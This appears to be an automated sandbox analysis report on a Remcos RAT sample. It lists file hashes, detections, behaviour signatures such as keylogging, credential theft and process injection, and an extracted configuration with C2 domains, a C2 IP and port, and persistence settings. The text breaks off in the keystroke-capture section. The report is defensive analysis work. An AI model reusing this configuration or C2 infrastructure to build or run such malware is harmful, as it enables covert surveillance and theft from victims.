Windows Analysis Report
kyFBQxVbsg.exe

Overview

General Information

Sample Name:	kyFBQxVbsg.exe
Analysis ID:	652393
MD5:	972334f0c55d0aeab0b32efe41ea3470
SHA1:	e9097b5cd1f976ecaf0accedf14f1d22bd72e6fa
SHA256:	eb91bf1e2eb3877f0942cef113bb0fb76e2c2fd2c2651dbf09f6da6df649e8fb
Tags:	exeRATRemcosRAT
Infos:

Detection

Remcos

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Multi AV Scanner detection for submitted file

Malicious sample detected (through community Yara rule)

Yara detected Remcos RAT

Antivirus / Scanner detection for submitted sample

Multi AV Scanner detection for dropped file

Contains functionality to steal Firefox passwords or cookies

Yara detected Costura Assembly Loader

Encrypted powershell cmdline option found

Machine Learning detection for sample

.NET source code contains potential unpacker

.NET source code contains very large array initializations

Contains functionality to inject code into remote processes

Installs a global keyboard hook

Delayed program exit found

Contains functionality to steal Chrome passwords or cookies

Machine Learning detection for dropped file

C2 URLs / IPs found in malware configuration

Antivirus or Machine Learning detection for unpacked file

Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)

Contains functionality to query locales information (e.g. system language)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Sample execution stops while process was sleeping (likely an evasion)

Contains functionality to enumerate running services

Contains functionality to dynamically determine API calls

Contains long sleeps (>= 3 min)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

PE file contains strange resources

Drops PE files

Contains functionality to read the PEB

Contains functionality to retrieve information about pressed keystrokes

Creates a process in suspended mode (likely to inject code)

Contains functionality for read data from the clipboard

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

Yara signature match

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Internet Provider seen in connection with other malware

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Contains functionality to call native functions

Contains functionality to launch a control a shell (cmd.exe)

Contains functionality to read the clipboard data

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Enables debug privileges

Creates a DirectInput object (often for capturing keystrokes)

Sample file is different than original file name gathered from version info

Extensive use of GetProcAddress (often used to hide API calls)

Detected TCP or UDP traffic on non-standard ports

Contains functionality to download and launch executables

Uses Microsoft's Enhanced Cryptographic Provider

Contains functionality to simulate mouse events

Classification

Signatures

AV Detection

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe

Avira: detection malicious, Label: TR/Dropper.MSIL.Gen

Multi AV Scanner detection for submitted file

Source: kyFBQxVbsg.exe	Virustotal: Detection: 46%			Perma Link
Source: kyFBQxVbsg.exe	ReversingLabs: Detection: 57%

Yara detected Remcos RAT

Source: Yara match	File source: 17.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.Qerdo.exe.40dfb10.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.Qerdo.exe.35cfb10.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 24.2.Qerdo.exe.40dfb10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.7.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.2.InstallUtil.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.kyFBQxVbsg.exe.38cfb10.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.5.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.7.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.2.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.6.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 17.0.InstallUtil.exe.400000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.3.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.kyFBQxVbsg.exe.38cfb10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 28.0.InstallUtil.exe.400000.8.unpack, type: UNPACKEDPE
Source: Yara match	File source: 26.0.InstallUtil.exe.400000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.Qerdo.exe.35cfb10.3.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000011.00000000.535499326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.533973605.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.594041394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.601490372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.612287399.00000000040DF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.592527384.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.536706156.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.533640248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.534323754.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.591921739.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.607934228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.598510412.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.606949507.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.593660616.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.603389337.000000000352F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.541310066.000000000382F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.594464654.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.595033873.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.536064780.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.603526142.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000000.534848870.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.599641579.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.599125899.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.596165958.0000000000BC7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.646242553.00000000011E8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000018.00000002.612156985.000000000403F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.541421315.00000000038CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000000.593157225.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000002.608522925.0000000000B37000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001A.00000002.595851570.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000001C.00000000.606295959.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.605837275.00000000035CF000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: kyFBQxVbsg.exe PID: 6232, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 6528, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Qerdo.exe PID: 6216, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: Qerdo.exe PID: 5652, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 5836, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: InstallUtil.exe PID: 6304, type: MEMORYSTR

Antivirus / Scanner detection for submitted sample

Source: kyFBQxVbsg.exe

Avira: detected

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe

ReversingLabs: Detection: 57%

Machine Learning detection for sample

Source: kyFBQxVbsg.exe

Joe Sandbox ML: detected

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\Ppjollp\Qerdo.exe

Joe Sandbox ML: detected

Antivirus or Machine Learning detection for unpacked file

Source: 26.2.InstallUtil.exe.400000.0.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 26.0.InstallUtil.exe.400000.1.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 26.0.InstallUtil.exe.400000.7.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 17.0.InstallUtil.exe.400000.8.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 0.2.kyFBQxVbsg.exe.2e0000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen
Source: 28.0.InstallUtil.exe.400000.5.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 26.0.InstallUtil.exe.400000.0.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 17.0.InstallUtil.exe.400000.2.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 17.0.InstallUtil.exe.400000.3.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 17.0.InstallUtil.exe.400000.4.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 19.2.Qerdo.exe.40000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen
Source: 28.0.InstallUtil.exe.400000.3.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 17.0.InstallUtil.exe.400000.7.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 28.0.InstallUtil.exe.400000.7.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 17.0.InstallUtil.exe.400000.1.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 26.0.InstallUtil.exe.400000.2.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 17.0.InstallUtil.exe.400000.6.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 19.0.Qerdo.exe.40000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen
Source: 28.2.InstallUtil.exe.400000.0.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 28.0.InstallUtil.exe.400000.4.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 17.0.InstallUtil.exe.400000.5.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 28.0.InstallUtil.exe.400000.6.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 24.2.Qerdo.exe.9a0000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen
Source: 28.0.InstallUtil.exe.400000.1.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 26.0.InstallUtil.exe.400000.8.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 24.0.Qerdo.exe.9a0000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen
Source: 26.0.InstallUtil.exe.400000.5.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 17.2.InstallUtil.exe.400000.0.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 0.0.kyFBQxVbsg.exe.2e0000.0.unpack	Avira: Label: TR/Dropper.MSIL.Gen
Source: 17.0.InstallUtil.exe.400000.0.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 28.0.InstallUtil.exe.400000.0.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 26.0.InstallUtil.exe.400000.6.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 26.0.InstallUtil.exe.400000.4.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 28.0.InstallUtil.exe.400000.2.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 28.0.InstallUtil.exe.400000.8.unpack	Avira: Label: BDS/Backdoor.Gen
Source: 26.0.InstallUtil.exe.400000.3.unpack	Avira: Label: BDS/Backdoor.Gen

Source: 26.2.InstallUtil.exe.400000.0.unpack

Malware Configuration Extractor: Remcos {"Version": "3.5.1 Pro", "Host:Port:Password": "nikahuve.ac.ug:6968:0kalskala.ac.ug:6968:0tuekisaa.ac.ug:6968:0parthaha.ac.ug:6968:0", "Assigned name": "06192022", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "cvxyttydfsgbghfgfhtd-RXTSAM", "Keylog flag": "1", "Keylog path": "AppData", "Keylog file": "scxs.dat", "Keylog crypt": "Enable", "Hide keylog file": "Enable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "forbas", "Keylog file max size": "0"}

Uses Microsoft's Enhanced Cryptographic Provider

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_00430185 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,

17_2_00430185

Source: kyFBQxVbsg.exe, 00000000.00000002.541310066.000000000382F000.00000004.00000800.00020000.00000000.sdmp

Binary or memory string: -----BEGIN PUBLIC KEY-----

Uses 32bit PE files

Source: kyFBQxVbsg.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: kyFBQxVbsg.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: protobuf-net.pdbSHA256 source: kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582007777.000000000368E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582307729.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588674839.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588792827.0000000004216000.00000004.00000800.00020000.00000000.sdmp
Source:	Binary string: protobuf-net.pdb source: kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582007777.000000000368E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582307729.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588674839.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588792827.0000000004216000.00000004.00000800.00020000.00000000.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_00406571 SetEvent,ShellExecuteW,GetLogicalDriveStringsA,GetFileAttributesW,DeleteFileW,Sleep,StrToIntA,CreateDirectoryW,

17_2_00406571

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_0040A1C4 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	17_2_0040A1C4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_0040620E FindFirstFileW,FindNextFileW,	17_2_0040620E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_004162EF FindFirstFileW,FindNextFileW,FindNextFileW,	17_2_004162EF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_0040A3CB FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	17_2_0040A3CB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_0044A569 FindFirstFileExA,	17_2_0044A569
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_004187B1 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	17_2_004187B1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_00407AC0 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	17_2_00407AC0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_00407ED2 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	17_2_00407ED2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe	Code function: 17_2_00406EEF __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	17_2_00406EEF

Networking

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: nikahuve.ac.ug

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: DANILENKODE DANILENKODE

IP address seen in connection with other malware

Source: Joe Sandbox View

IP Address: 194.5.98.107 194.5.98.107

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.6:49798 -> 194.5.98.107:6968

Source: InstallUtil.exe	String found in binary or memory: http://geoplugin.net/json.gp
Source: kyFBQxVbsg.exe, 00000000.00000002.541310066.000000000382F000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000002.541421315.00000000038CF000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000000.535499326.0000000000400000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000000.533640248.0000000000400000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000011.00000002.645272430.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000002.603389337.000000000352F000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000002.605837275.00000000035CF000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000002.612287399.00000000040DF000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000002.612156985.000000000403F000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000000.594041394.0000000000400000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000000.591921739.0000000000400000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000001A.00000002.595851570.0000000000400000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000001C.00000000.601490372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000001C.00000002.607934228.0000000000400000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 0000001C.00000000.598510412.0000000000400000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: http://geoplugin.net/json.gp/C
Source: kyFBQxVbsg.exe, 00000000.00000002.540068634.000000000269C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582007777.000000000368E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582307729.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588674839.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588792827.0000000004216000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-net
Source: kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582007777.000000000368E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582307729.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588674839.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588792827.0000000004216000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-netJ
Source: kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582007777.000000000368E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582307729.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588674839.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588792827.0000000004216000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/mgravell/protobuf-neti
Source: kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582007777.000000000368E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582307729.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588674839.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588792827.0000000004216000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/11564914/23354;
Source: kyFBQxVbsg.exe, 00000000.00000002.540068634.000000000269C000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000002.597952189.000000000239C000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582007777.000000000368E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582307729.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588674839.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000002.610776047.0000000002EAC000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588792827.0000000004216000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/14436606/23354
Source: kyFBQxVbsg.exe, 00000000.00000003.526677018.000000000398E000.00000004.00000800.00020000.00000000.sdmp, kyFBQxVbsg.exe, 00000000.00000003.526824087.0000000003A06000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582007777.000000000368E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000013.00000003.582307729.0000000003706000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588674839.000000000419E000.00000004.00000800.00020000.00000000.sdmp, Qerdo.exe, 00000018.00000003.588792827.0000000004216000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://stackoverflow.com/q/2152978/23354

Source: unknown

DNS traffic detected: queries for: nikahuve.ac.ug

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Code function: 17_2_0042386F recv,

17_2_0042386F

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

Jump to behavior

Contains functionality to retrieve information about pressed keystrokes

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe

